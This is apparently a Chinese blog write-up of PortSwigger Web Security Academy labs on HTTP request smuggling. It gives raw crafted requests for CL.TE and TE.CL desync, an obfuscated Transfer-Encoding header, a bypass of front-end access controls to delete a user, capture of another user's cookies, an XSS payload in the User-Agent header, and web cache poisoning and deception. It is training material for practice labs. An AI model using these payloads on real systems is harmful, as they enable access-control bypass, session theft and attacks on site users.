HTTP request smuggling

目录

建议配合浅谈HTTP请求走私食用

HTTP request smuggling, basic CL.TE vulnerability

  • 题目描述

    • 此靶场有前端&后端服务器
    • 前端服务器不支持Tranfer-Encoding
    • 前端服务器拒绝除GET POST之外的请求方式
  • 要求

    • 进行一次GPOST请求
  • 解题过程

    • 构造请求

      • Content-LengthTransfer-Encoding 同时出现时,Content-Length 会被忽略。
      • Content-Length计算时,要把\r\n计算在内(2字节),且首行的\r\n不计算
      POST / HTTP/1.1
      Host: ac521fe01ea7d406808f07ec00ae0019.web-security-academy.net
      Connection: close
      Content-Length: 6
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked 0 G

      前端服务器正常处理,但发送到后端服务器时,会产生两个请求:

      POST / HTTP/1.1
      Host: ac521fe01ea7d406808f07ec00ae0019.web-security-academy.net
      Connection: close
      Content-Length: 6
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked 0

      G

      只需要再用POST访问一次,即可拼接成

      GPOST / HTTP/1.1
      Host: ac521fe01ea7d406808f07ec00ae0019.web-security-academy.net
      Connection: close
      Content-Length: 6
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked 0

HTTP request smuggling, basic TE.CL vulnerability

  • 题目描述

    • 此靶场有前端&后端服务器
    • 后端服务器不支持Transfer-Encoding
    • 前端服务器拒绝除GET POST之外的所有请求方式
  • 要求

    • 进行一次GPOST请求
  • 解题过程

    • 需要关闭Burp Suite中的Update COntent-Length选项

    • 构造请求

      • 需要注意,chunked下,需要在每个chunk前用十六进制表示该chunk的大小(不算表示块终的\r\n
      POST / HTTP/1.1
      Host: acfd1f981fff47c180bb187600d00030.web-security-academy.net
      Content-Type: application/x-www-form-urlencoded
      Content-length: 4
      Transfer-Encoding: chunked 57
      GPOST / HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 10 0

HTTP request smuggling, obfuscating the TE header

  • 题目描述

    • 此靶场有前端&后端服务器
    • 有重复的HTTP请求头时,两个服务器的处理方式不同
    • 前端服务器拒绝GET POST之外的请求方式
  • 要求

    • 进行一次GPOST请求
  • 解题过程

    • 示例试了好多都不行,看了solution,要多加一个Transfer-encoding: xxx。。。发现审题审错了

      POST / HTTP/1.1
      Host: ac121fa21f537ddc80cc62410043006a.web-security-academy.net
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Transfer-encoding: x
      Content-Length: 4 57
      GPOST / HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 10 0

HTTP request smuggling, confirming a CL.TE vulnerability via differential responses

  • 题目描述

    • 此靶场有前端&后端服务器
    • 前端服务器不支持Transfer-Encoding
  • 要求

    • 进行HTTP请求走私,使得下一个访问/的请求返回404
  • 解题过程

    • 构造一个访问404页面的请求走私就好了

      POST / HTTP/1.1
      Host: ac941f561fb1305680d6062e0058002c.web-security-academy.net
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Content-Length: 79 0 GET /404 HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      X: x

HTTP request smuggling, confirming a TE.CL vulnerability via differential responses

  • 题目描述

    • 此靶场有前端&后端服务器
    • 后端服务器不支持Transfer-Encoding
  • 要求

    • 进行HTTP请求走私,使得下一个访问/的请求返回404
  • 解题过程

    • 和上一题类似,换成TE.CL就好了

      POST / HTTP/1.1
      Host: ac481f211e557bc680d30660008a00f3.web-security-academy.net
      Content-Type: application/x-www-form-urlencoded
      Content-length: 4
      Transfer-Encoding: chunked 58
      GET /404 HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 30 0

Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability

  • 题目描述

    • 此靶场有前端&后端服务器
    • 前端服务器不支持Transfer-Encoding
    • 存在管理员页面/admin,但前端服务器禁止访问该页面
  • 要求

    • 访问/admin并删除carlos的账号(这出题人指定跟carlos过不去)
  • 解题过程

    • 和上面的思路一样,走私一个访问/admin的请求

      POST / HTTP/1.1
      Host: ac2a1f221e94836b8057a22200d40099.web-security-academy.net
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Content-Length: 79 0 GET /admin HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      X: x

      提示Admin interface only available to local users,添加一个伪造IP的请求头(把知道的都试了一遍都不行,看了solution需要用host

      POST / HTTP/1.1
      Host: ac2a1f221e94836b8057a22200d40099.web-security-academy.net
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Content-Length: 79 0 POST /admin HTTP/1.1
      Host: localhost
      Content-Type: application/x-www-form-urlencoded xxx&

      紧跟着的请求

      GET / HTTP/1.1
      Host: ac2a1f221e94836b8057a22200d40099.web-security-academy.net

      然后按照上面的方法,构造一个删除carlos账号的请求就好了

    • 最终的exp === /admin换成/admin/delete?username=carlos

Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

  • 题目描述

    • 此靶场有前端&后端服务器
    • 后端服务器不支持Transfer-Encoding
    • 存在管理员页面/admin,但前端服务器禁止访问该页面
  • 要求

    • 访问/admin并删除carlos的账号
  • 解题过程

    • 换汤不换药,上一题的方法改成TE.CL就行

    • exp

      POST / HTTP/1.1
      Host: ac7a1fa81ef16a3a800c23a400de003c.web-security-academy.net
      Content-Type: application/x-www-form-urlencoded
      Content-length: 4
      Transfer-Encoding: chunked 83
      POST /admin/delete?username=carlos HTTP/1.1
      Host: localhost
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 30 0
      GET / HTTP/1.1
      Host: ac7a1fa81ef16a3a800c23a400de003c.web-security-academy.net

Exploiting HTTP request smuggling to reveal front-end request rewriting

  • 题目描述

    • 此靶场有前端&后端服务器
    • 前端服务器不支持Transfer-Encoding --> CL.TE
    • 存在管理员页面/admin,但只有ip==127.0.0.1的用户才能访问
    • 前端服务器 给传入的请求添加了包含IP的HTTP请求头
    • 大致意思
      • HTTP请求 --> 前端服务器 (添加HTTP请求头)--> 后端服务器
  • 要求

    • 删除carlos的账号
  • 解题过程

    • 材料给了提示,先找找会返回输入的 (POST) 功能点 --> 搜索

    • 先构造个简单的,看看前端服务器添加了些啥

      POST / HTTP/1.1
      Host: ac611f541e199c3880625911008c0059.web-security-academy.net
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Content-Length: 101 0 POST / HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 222 search=

      连发两边,获得请求包:

      POST / HTTP/1.1
      X-qFYlCI-Ip: 13.127.209.47
      Host: ac611f541e199c3880625911008c0059.web-security-academy.net
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Content-Length: 101 0

      设置IP的请求头X-qFYlCI-Ip

    • 构造exp

      POST / HTTP/1.1
      Host: ac611f541e199c3880625911008c0059.web-security-academy.net
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Content-Length: 144 0 POST /admin/delete?username=carlos HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      X-qFYlCI-Ip: 127.0.0.1
      Content-Length: 0

Exploiting HTTP request smuggling to capture other users' requests

  • 题目描述

    • 此靶场有前端&后端服务器
    • 前端服务器不支持Transfer-Encoding --> CL.TE
  • 要求

    • 通过走私请求来获取下一个用户的请求,并使用下一个用户的cookie登录
  • 解题过程

    • 需要寻找一个可以返回/保存信息的功能点 --> 评论 ,而且csrf token不会失效

    • 构造exp

      POST / HTTP/1.1
      Host: ace91f721e814bba80f528c000a600f8.web-security-academy.net
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Cookie: victim-fingerprint=w09BWrZPFqVXkVgkVvuEboC4NdVpeGTW; secret=EOQzcrm5jNsBBUO2hWKEOl0WWzwl1bjs;
      Content-Length: 291 0 POST /post/comment HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Cookie: session=jQaZVDTI26LnAcK6YSDCWY2yDIgJWXqa
      Content-Length: 764 csrf=U65lnzldkL6JqoUw6XYEEAXmaK4RhXbF&postId=5&name=asd&email=test%40test.com&website=https%3A%2F%2Fasd%27%27%27%27&comment=aaaaaaaaaaa

      测了老半天,受害者差不多2分钟左右访问一次,然后这个长度也是。。。经常读到小半截cookie

Exploiting HTTP request smuggling to deliver reflected XSS

  • 题目描述

    • 此靶场有前端&后端服务器
    • 前端服务器不支持Transfer-Encoding --> CL.TE
    • UA头存在反射型xss
  • 要求

    • 通过HTTP请求走私,让受害者执行alert(1)
  • 解题过程

    • 先找xss功能点

      • 在评论框里会加载uA

    • 构造exp

      POST / HTTP/1.1
      Host: ac621f9e1edd0ed4807e5a3c00f9004a.web-security-academy.net
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Content-Length: 136 0 GET /post?postId=7 HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      User-Agent: asd"><svg/onload=alert(1)><
      Padding: xxx

Exploiting HTTP request smuggling to perform web cache poisoning

  • 题目描述

    • 此靶场有前端&后端服务器
    • 前端服务器不支持Transfer-Encoding --> CL.TE
    • 前端服务器会缓存某些响应
  • 要求

    • 通过缓存投毒,把JS源重定向到exploit server,执行alert(document.cookie)

      • 缓存投毒,就是通过恶意的请求,污染正常的源文件(可以是整个文件的重定向,也可以是其中部分代码),那么之后的请求都会访问到恶意代码。
  • 解题过程

    • 需要构造两个请求,并且设置exploit server

      • 第一个是HTTP请求走私,使下一个访问js资源的请求重定向到exploit server

        • 填坑:这里需要注意,重定向到exploit server的请求需要让后端服务器正常处理,也就是说这里的跳转必须符合后端服务器的正常路由
      • 第二个是正常的访问js资源,使前端服务器更新缓存
      • 很人性化,exploit server已经设置好了(Content-Type: application/javascript)如果CT不对的话,是不会执行的,在body填上alert(document.cookie);就行
    • 构造exp(/post/next必须使用GET方法,其他方法会返回404

      POST / HTTP/1.1
      Host: acb81f971f48e35c80610c45008d0058.web-security-academy.net
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Content-Length: 186 0 GET /post/next?postId=3 HTTP/1.1
      Host: acd41f671fb3e37980dd0c0a01580001.web-security-academy.net
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 20 padding=xxx

      然后浏览器访问/resources/js/tracking.js即可

Exploiting HTTP request smuggling to perform web cache deception

  • 题目描述

    • 此靶场有前端&后端服务器
    • 前端服务器不支持Transfer-Encoding --> CL.TE
    • 前端服务器会缓存静态资源
    • 受害者在我们发送请求后30秒访问API
  • 要求

    • 获取受害者API key并提交
  • 解题过程

    • 直接构造exp,要去掉无用的请求头,避免出现dumplicate错误,看了网页源码,我猜受害者会请求tracking.js

      POST / HTTP/1.1
      Host: acef1f451e05881080b6051300a50062.web-security-academy.net
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Transfer-Encoding: chunked
      Content-Length: 186 0 GET /my-account HTTP/1.1
      Padding: x
    • 获取了半天获取不到,看了下solution,思路没错,但是获取方式有点奇怪?要一直发,然后再要用无痕浏览器强制打开看???

      我猜是避免用自己的cookie进行缓存欺骗

Portswigger web security academy:HTTP request smuggling的更多相关文章

  1. Portswigger web security academy:Cross-site request forgery (CSRF)

    Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...

  2. Portswigger web security academy:Server-side request forgery (SSRF)

    Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...

  3. Portswigger web security academy:WebSockets

    Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...

  4. Portswigger web security academy:Clickjacking (UI redressing)

    Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...

  5. Portswigger web security academy:Cross-origin resource sharing (CORS)

    Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...

  6. Portswigger web security academy:XML external entity (XXE) injection

    Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...

  7. Portswigger web security academy:OAth authentication vulnerable

    Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...

  8. Portswigger web security academy:OS command injection

    Portswigger web security academy:OS command injection 目录 Portswigger web security academy:OS command ...

  9. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

随机推荐

  1. scrapy框架爬取图片并将图片保存到本地

    如果基于scrapy进行图片数据的爬取 在爬虫文件中只需要解析提取出图片地址,然后将地址提交给管道 配置文件中:IMAGES_STORE = './imgsLib' 在管道文件中进行管道类的制定: f ...

  2. C# 应用 - 多线程 4) Task cancel

    1. 操作取消 1.1 步骤 实例化 CancellationTokenSource 对象,该对象管理取消通知并将其发送给单个取消标记 将 CancellationTokenSource.Token ...

  3. PTA 统计二叉树度为1的结点个数

    6-3 统计二叉树度为1的结点个数 (10 分)   本题要求实现一个函数,可统计二叉树中度为1的结点个数. 函数接口定义: int NodeCount ( BiTree T); T是二叉树树根指针, ...

  4. 【小白学算法】5.链表(linked list)、链表的添加

    链表其实也就是 线性表的链式存储结构,与之前讲到的顺序存储结构不同. 我们知道顺序存储结构中的元素地址都是连续的,那么这就有一个最大的缺点:当做插入跟删除操作的时候,大量的元素需要移动. 如图所示,元 ...

  5. Airtest简单上手讲解

    Airtest是网易开发的手机UI界面自动化测试工具,它原本的目的是通过所见即所得,截图点击等等功能,简化手机App图形界面测试代码编写工作. 安装和使用 由于本文的目的是介绍如何使用Airtest来 ...

  6. pycharm在debug时总是报UnicodeDecodeError

    1,原文链接 解决pycharm run 正常 debug 报 UnicodeDecodeError 错误的问题 2,解决方法 首先尝试 如果上面还不行

  7. python基础(三):元组

    什么是元组 有时候你需要创建一系列不可修改的元素,元组可以满足这种需求.Python将不能修改的值称为不可变的,而不可变的列表被称为元组. 元组的定义和访问 元组使用圆括号来定义,我们已经知道:元组也 ...

  8. 从wav到Ogg Opus 以及使用java解码OPUS

    PCM 自然界中的声音非常复杂,波形极其复杂,通常我们采用的是脉冲代码调制编码,即PCM编码.PCM通过抽样.量化.编码三个步骤将连续变化的模拟信号转换为数字编码. 采样率 采样频率,也称为采样速度或 ...

  9. 「Unity卡牌自走棋」项目NABCD分析

    项目 内容 这个作业属于哪个课程 2021学年春季软件工程(罗杰 任健) 这个作业的要求在哪里 团队项目-初次邂逅,需求分析 在这个课程的目标是 锻炼在大规模开发中的团队协作能力 这个作业在哪个具体方 ...

  10. 死磕Spring之AOP篇 - Spring AOP总览

    该系列文章是本人在学习 Spring 的过程中总结下来的,里面涉及到相关源码,可能对读者不太友好,请结合我的源码注释 Spring 源码分析 GitHub 地址 进行阅读. Spring 版本:5.1 ...